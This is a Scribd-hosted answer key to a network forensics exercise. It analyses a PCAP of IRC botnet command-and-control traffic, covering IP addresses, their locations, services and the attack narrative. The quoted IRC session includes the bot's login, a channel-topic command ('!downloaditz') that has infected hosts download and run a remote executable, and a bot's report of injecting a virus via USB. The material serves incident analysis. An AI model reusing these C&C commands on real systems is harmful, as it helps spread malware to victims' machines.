Scribd
Upload
935 views3 pages

Command and Control via IRC Analysis

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication - one in France and two private IPs. 2. The private IPs are running DNS and message tracking services while the public IP runs a C&C server on port 5540. 3. The PCAP shows IRC communication between a client and C&C server where a virus was injected onto a system and the author attempted to distribute another executable file. This indicates an attack involving malware control over IRC.

Uploaded by

rajuraikar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
935 views3 pages

Command and Control via IRC Analysis

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication - one in France and two private IPs. 2. The private IPs are running DNS and message tracking services while the public IP runs a C&C server on port 5540. 3. The PCAP shows IRC communication between a client and C&C server where a virus was injected onto a system and the author attempted to distribute another executable file. This indicates an attack involving malware control over IRC.

Uploaded by

rajuraikar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
  • Answer Key
  • PCAP File Analysis
  • IRC Channel Data

Answers:-

---------------------------------------------------------------------------------------------------------------------------------------

Question 1. Write down the IP addresses of all the machines involved

Tool Used: Wireshark

Total IP's: 3

[Link]

[Link]

[Link]

---------------------------------------------------------------------------------------------------------------------------------------

Question 2. What is the location of these IP addresses?

Site Used: [Link]

IP: [Link]

Host name: [Link].

IP address: [Link]

Location: Paris, FRANCE

Below IP's are private IP address

[Link]

[Link]

---------------------------------------------------------------------------------------------------------------------------------------

Question 3. What services run on these IP addresses?

On [Link] a TCP port 5540 is running (as per SANS) the service is sdreport

On [Link] a UDP port 53 is running which is DNS service and

On [Link] a TCP port 1038 and UDP port 1037 is running and the service is Message Tracking
Query Protocol (MTQP) (as per SANS)

---------------------------------------------------------------------------------------------------------------------------------------

Question 4. Please explain the attack in detail and what you think is going on in this PCAP file:
From a quick glance on PCAP file we can find Command and Control communication between client
and server via IRC using port tcp/1038 and C&C server tcp/5540

IRC Server: [Link]

Nick Name: pLagUe{USA}64007

Message:

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .[Link].. on drive.4. D:

A virus infection was injected on client.

Below is the IRC channel data


PASS mierdaq

NICK pLagUe{USA}64007

USER SkuZ * ok .[Link] UniX b0at 0.4

:[Link] NOTICE AUTH :*** Looking up your hostname...

:[Link] NOTICE AUTH :*** Checking ident...

:[Link] NOTICE AUTH :*** No ident response; username prefixed with ~

:[Link] NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

PING :56EF9DAC

PONG 56EF9DAC

:[Link] 001 pLagUe{USA}64007 :Welcome to the AccesoX IRC Network pLagUe{USA}64007!~SkuZ@[Link]

:[Link] 002 pLagUe{USA}64007 :Your host is [Link], running version Unreal3.2.9-rc1

:[Link] 003 pLagUe{USA}64007 :This server was created ven mar 25 2011 at [Link] CET

:[Link] 004 pLagUe{USA}64007 [Link] Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp


lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ

:[Link] 005 pLagUe{USA}64007 CMDS=KNOCK,MAP,DCCALLOW,USERIP UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=16


CHANLIMIT=#:16 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this
server

:[Link] 005 pLagUe{USA}64007 MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=#
PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=AccesoX CASEMAPPING=ascii EXTBAN=~,qjncrR
ELIST=MNUCT :are supported by this server

:[Link] 005 pLagUe{USA}64007 STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

PRIVMSG ##verga## :.[Link] PuTo InfeCcIoN.


:[Link] 251 pLagUe{USA}64007 :There are 56 users and 189 invisible on 9 servers

:[Link] 252 pLagUe{USA}64007 8 :operator(s) online

:[Link] 253 pLagUe{USA}64007 1 :unknown connection(s)

:[Link] 254 pLagUe{USA}64007 30 :channels formed

:[Link] 255 pLagUe{USA}64007 :I have 28 clients and 0 servers

:[Link] 265 pLagUe{USA}64007 :Current Local Users: 28 Max: 196

:[Link] 266 pLagUe{USA}64007 :Current Global Users: 245 Max: 2976

:[Link] 372 pLagUe{USA}64007 :- This is the short MOTD. To view the complete MOTD type /motd

:[Link] 372 pLagUe{USA}64007 :-

:[Link] 376 pLagUe{USA}64007 :End of /MOTD command.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :+ix

:Global!services@[Link] NOTICE pLagUe{USA}64007 :[.Random News. - Oct 14 2010] Registren sus nick de nuevo ... gracias.

:NickServ!services@[Link] NOTICE pLagUe{USA}64007 :Your nick isn't registered.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :-ix

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

:pLagUe{USA}64007!~SkuZ@[Link] JOIN :##verga##

:[Link] 332 pLagUe{USA}64007 ##verga## :!downloaditz [Link] c:\[Link] 1

:[Link] 333 pLagUe{USA}64007 ##verga## ragebot 1298999449

:[Link] 353 pLagUe{USA}64007 @ ##verga## :pLagUe{USA}64007

:[Link] 366 pLagUe{USA}64007 ##verga## :End of /NAMES list.

:[Link] 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

MODE ##verga## -ix

:[Link] 482 pLagUe{USA}64007 ##verga## :You're not channel operator

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .[Link].. on drive.4. D:

:[Link] 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

PING :[Link]

PONG [Link]

---------------------------------------------------------------------------------------------------------------------------------------

You might also like